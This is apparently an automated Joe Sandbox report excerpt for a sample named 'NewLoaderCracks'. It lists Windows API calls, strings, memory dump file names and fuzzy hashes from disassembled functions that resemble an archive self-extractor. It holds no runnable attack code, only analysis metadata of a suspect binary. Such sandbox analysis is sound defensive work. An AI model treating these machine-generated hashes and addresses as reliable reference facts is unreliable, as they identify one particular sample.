                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 0-1718035505
                • Opcode ID: 2d6701aa7102424dd335a9dc7abbc6b33a5694881b93ed109759b0c7b6be7b1b
                • Instruction ID: c665c93274c033bdc20b5176b26870cca4ded8610cf18d570d3752b68f3e29b3
                • Opcode Fuzzy Hash: 2d6701aa7102424dd335a9dc7abbc6b33a5694881b93ed109759b0c7b6be7b1b
                • Instruction Fuzzy Hash: 2701F9336513225B4F305FB46CB92A66FB4BA52323320553BED45D3240EA91CC8DF6B0
                APIs
                • _free.LIBCMT ref: 0056807E
                  • Part of subcall function 005684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958), ref: 005684F4
                  • Part of subcall function 005684DE: GetLastError.KERNEL32(00573958,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958,00573958), ref: 00568506
                • _free.LIBCMT ref: 00568090
                • _free.LIBCMT ref: 005680A3
                • _free.LIBCMT ref: 005680B4
                • _free.LIBCMT ref: 005680C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID: W
                • API String ID: 776569668-3818464504
                • Opcode ID: 34c266055796986cc4bb74a2223a2ec3bdfe839e944793ccec30201d195127b7
                • Instruction ID: e7ac5017bef17f77ddc358cd14d713df031edb693de805f613f9f7e871a32365
                • Opcode Fuzzy Hash: 34c266055796986cc4bb74a2223a2ec3bdfe839e944793ccec30201d195127b7
                • Instruction Fuzzy Hash: 4DF090B8801E328B8B516F16BC464257F64BB7A765B08474AF404DBE70CF314489BFD9
                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00550D0D
                  • Part of subcall function 0054ACF5: GetVersionExW.KERNEL32(?), ref: 0054AD1A
                • LocalFileTimeToFileTime.KERNEL32(?,00550CB8), ref: 00550D31
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00550D47
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00550D56
                • SystemTimeToFileTime.KERNEL32(?,00550CB8), ref: 00550D64
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00550D72
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: ad3ea2db8fb8755e077c736ea9ee05c4d3fe3bba54ff901378fa4f6fa1b97e4e
                • Instruction ID: e8a2ee38f8d65856d778caa9590483107db6a48aadcfeae465b568eba9f18fe3
                • Opcode Fuzzy Hash: ad3ea2db8fb8755e077c736ea9ee05c4d3fe3bba54ff901378fa4f6fa1b97e4e
                • Instruction Fuzzy Hash: 6531FB7A90020AEBCB00DFE4D8859EFFBBCFF58710B04455AE955E3210E7309A89DB64
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: dad2dd69ce764c8a39cb5a7c2480dd797eff7742066f022876f8dc7db80bf709
                • Instruction ID: 0a84a0453d9cfaf4a5dce27943e3b406be68425497f83d2558d729a7cbaf371b
                • Opcode Fuzzy Hash: dad2dd69ce764c8a39cb5a7c2480dd797eff7742066f022876f8dc7db80bf709
                • Instruction Fuzzy Hash: 4E2181B560020EFBD7049E10DC91E6B7FADBB90786F10C92AFC0D9A211F268ED499791
                APIs
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0055D2F2
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0055D30C
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0055D31D
                • TranslateMessage.USER32(?), ref: 0055D327
                • DispatchMessageW.USER32(?), ref: 0055D331
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0055D33C
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                • String ID:
                • API String ID: 2148572870-0
                • Opcode ID: a25c09c9295c0eee8d5c3adbb1c8b0f698e56a5200460d56fb225263ee755d25
                • Instruction ID: 9eea537e322eec38a0ae717af4af7598e237c8888935c13c92fd0a3c661cc08b
                • Opcode Fuzzy Hash: a25c09c9295c0eee8d5c3adbb1c8b0f698e56a5200460d56fb225263ee755d25
                • Instruction Fuzzy Hash: B9F03172A01119ABCB206BA5EC4DDDBBF7DFF62361F004412F906D2010D6349549D7B1
                APIs
                • _wcschr.LIBVCRUNTIME ref: 0055C435
                  • Part of subcall function 005517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0054BB05,00000000,.exe,?,?,00000800,?,?,005585DF,?), ref: 005517C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CompareString_wcschr
                • String ID: <$HIDE$MAX$MIN
                • API String ID: 2548945186-3358265660
                • Opcode ID: 3364d127cdf00aca75256469daafc89088bcc738208eb87e26c0787ede50cb0e
                • Instruction ID: 94345e40f7329a83ee5b931603f17213bf6315cd35cd2debd400cd5f67207a34
                • Opcode Fuzzy Hash: 3364d127cdf00aca75256469daafc89088bcc738208eb87e26c0787ede50cb0e
                • Instruction Fuzzy Hash: 3C318276900709AEEF21DA94CC65EEA7FBCFB54306F004467FD0996051EBB19EC88A51
                APIs
                  • Part of subcall function 0054130B: GetDlgItem.USER32(00000000,00003021), ref: 0054134F
                  • Part of subcall function 0054130B: SetWindowTextW.USER32(00000000,005735B4), ref: 00541365
                • EndDialog.USER32(?,00000001), ref: 0055A9DE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0055A9F6
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 0055AA24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1$xjY
                • API String ID: 445417207-1267677434
                • Opcode ID: 69202ee893a837bb7a7388cc47f91fd57b148e8507df8751c5f4375c4279b26e
                • Instruction ID: e24838f564c6a5e3f767a53b85241f43dce1af62c16443a7f39c4b1178674f88
                • Opcode Fuzzy Hash: 69202ee893a837bb7a7388cc47f91fd57b148e8507df8751c5f4375c4279b26e
                • Instruction Fuzzy Hash: 221148329401287ADB219E649D5AFFB3F7CFB4A302F000512FE45F2080D2609D99E672
                APIs
                • LoadBitmapW.USER32(00000065), ref: 0055ADFD
                • GetObjectW.GDI32(00000000,00000018,?), ref: 0055AE22
                • DeleteObject.GDI32(00000000), ref: 0055AE54
                • DeleteObject.GDI32(00000000), ref: 0055AE77
                  • Part of subcall function 00559E1C: FindResourceW.KERNEL32(0055AE4D,PNG,?,?,?,0055AE4D,00000066), ref: 00559E2E
                  • Part of subcall function 00559E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0055AE4D,00000066), ref: 00559E46
                  • Part of subcall function 00559E1C: LoadResource.KERNEL32(00000000,?,?,?,0055AE4D,00000066), ref: 00559E59
                  • Part of subcall function 00559E1C: LockResource.KERNEL32(00000000,?,?,?,0055AE4D,00000066), ref: 00559E64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                • String ID: ]
                • API String ID: 142272564-3352871620
                • Opcode ID: 7f5baec19bba1eaf320b581906dccd71fde81215c4916e42fa1d130ab9e4233f
                • Instruction ID: f674b46fcfa948c7f067aa7329931b259704dcef5ec71b4f65e1191be82ec6fe
                • Opcode Fuzzy Hash: 7f5baec19bba1eaf320b581906dccd71fde81215c4916e42fa1d130ab9e4233f
                • Instruction Fuzzy Hash: E901C432540216A7C71167689C2FA7F7F7DBFC2B53F090116BD00B7291DA758C1DA6A1
                APIs
                  • Part of subcall function 0054130B: GetDlgItem.USER32(00000000,00003021), ref: 0054134F
                  • Part of subcall function 0054130B: SetWindowTextW.USER32(00000000,005735B4), ref: 00541365
                • EndDialog.USER32(?,00000001), ref: 0055CCDB
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0055CCF1
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0055CD05
                • SetDlgItemTextW.USER32(?,00000068), ref: 0055CD14
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: a967fcde2f42c98f7aedb0c64baf74f048a5010f152914e46ae98426080ba26d
                • Instruction ID: a60b8a7a361f6fc7ad1c9a0ee528fff186432c6e2d9fd776759c6e879ce75027
                • Opcode Fuzzy Hash: a967fcde2f42c98f7aedb0c64baf74f048a5010f152914e46ae98426080ba26d
                • Instruction Fuzzy Hash: B801F1322843507ED6218F689C1BF673F6CFB6A703F100812F786E20A0C6A55D0DEB65
                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 0056251A
                  • Part of subcall function 00562B52: ___AdjustPointer.LIBCMT ref: 00562B9C
                • _UnwindNestedFrames.LIBCMT ref: 00562531
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00562543
                • CallCatchBlock.LIBVCRUNTIME ref: 00562567
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID: /)V
                • API String ID: 2633735394-169784293
                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction ID: 707c7ed261a4e64fc6519768ff75a0f3f1d05cadbb4cff958a005cf5e7c7c7a4
                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction Fuzzy Hash: D7010532000509ABCF229F65DC55E9A3FBAFF98710F058415FD1966120C336E961ABA1
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00567573,00000000,?,00567513,00000000,0057BAD8,0000000C,0056766A,00000000,00000002), ref: 005675E2
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005675F5
                • FreeLibrary.KERNEL32(00000000,?,?,?,00567573,00000000,?,00567513,00000000,0057BAD8,0000000C,0056766A,00000000,00000002), ref: 00567618
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 78b9a9b9b92dc8ca1838e17a24d768a798ff0d6927d11e375965679f562639dd
                • Instruction ID: 2a470fa744a7da7c6041c5e4d7ec91e91842fa2fc4f6266834cd381afd96fb6a
                • Opcode Fuzzy Hash: 78b9a9b9b92dc8ca1838e17a24d768a798ff0d6927d11e375965679f562639dd
                • Instruction Fuzzy Hash: C3F04470A0461CBBDB159F54EC09B9DBFB9FF18725F004069F809A6150EB709E88FA54
                APIs
                  • Part of subcall function 00550085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005500A0
                  • Part of subcall function 00550085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0054EB86,Crypt32.dll,00000000,0054EC0A,?,?,0054EBEC,?,?,?), ref: 005500C2
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0054EB92
                • GetProcAddress.KERNEL32(005881C0,CryptUnprotectMemory), ref: 0054EBA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: c4354b06120d1f839a99945f0ffc781b27f586b5bb966c08329e29d45d9ac47f
                • Instruction ID: 99a172b7598abcdcef794187076fadf8529ee58360e7899d4083e7ea1584d7ff
                • Opcode Fuzzy Hash: c4354b06120d1f839a99945f0ffc781b27f586b5bb966c08329e29d45d9ac47f
                • Instruction Fuzzy Hash: 4BE04F704007519ECB209F34A81EB82BEE4BF14725B00C81DE5DAD3190D6B4D584BB50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 5c441d4231ee8553422820c1555af1e750896960605e8efa2f3650e21957e7a0
                • Instruction ID: ec955ab7d12fcdc9249c1dde79efb2c135a06616f26bcb094680a61911123b84
                • Opcode Fuzzy Hash: 5c441d4231ee8553422820c1555af1e750896960605e8efa2f3650e21957e7a0
                • Instruction Fuzzy Hash: 2A41D432A003049FDB24DF78D885A5EBBA5FF89718F1545A9E915EB341EB31AE05CB80
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0056B619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0056B63C
                  • Part of subcall function 00568518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0056C13D,00000000,?,005667E2,?,00000008,?,005689AD,?,?,?), ref: 0056854A
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0056B662
                • _free.LIBCMT ref: 0056B675
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0056B684
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 2da1e7c4b7aef20e051b4ff9d13ca232e75a59d1d21dec80aafb07e00fd92ad3
                • Instruction ID: 8fc65b8570873c600590668b47d7a5ecbee34dfb8167bea7fc6b8b359641eac0
                • Opcode Fuzzy Hash: 2da1e7c4b7aef20e051b4ff9d13ca232e75a59d1d21dec80aafb07e00fd92ad3
                • Instruction Fuzzy Hash: 47018472601215BF77211676AC8CC7B6E6DFED6BB13150229F905C3111EF608D81A1B1
                APIs
                  • Part of subcall function 00550A41: ResetEvent.KERNEL32(?), ref: 00550A53
                  • Part of subcall function 00550A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00550A67
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0055078F
                • CloseHandle.KERNEL32(?,?), ref: 005507A9
                • DeleteCriticalSection.KERNEL32(?), ref: 005507C2
                • CloseHandle.KERNEL32(?), ref: 005507CE
                • CloseHandle.KERNEL32(?), ref: 005507DA
                  • Part of subcall function 0055084E: WaitForSingleObject.KERNEL32(?,000000FF,00550A78,?), ref: 00550854
                  • Part of subcall function 0055084E: GetLastError.KERNEL32(?), ref: 00550860
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: 97684dada76786c67c5fe528f9ca3478ed16440e87985507e6ca907dc572114a
                • Instruction ID: dd2a14b4c06f727bb88cfb3570b506d2ad994294473143eaa8249dcf4e4d875f
                • Opcode Fuzzy Hash: 97684dada76786c67c5fe528f9ca3478ed16440e87985507e6ca907dc572114a
                • Instruction Fuzzy Hash: FB019271450B04EBC7219B69EC88F86BFE9FB49721F004519F55E421A0CB756A88FBA1
                APIs
                • _free.LIBCMT ref: 0056BF28
                  • Part of subcall function 005684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958), ref: 005684F4
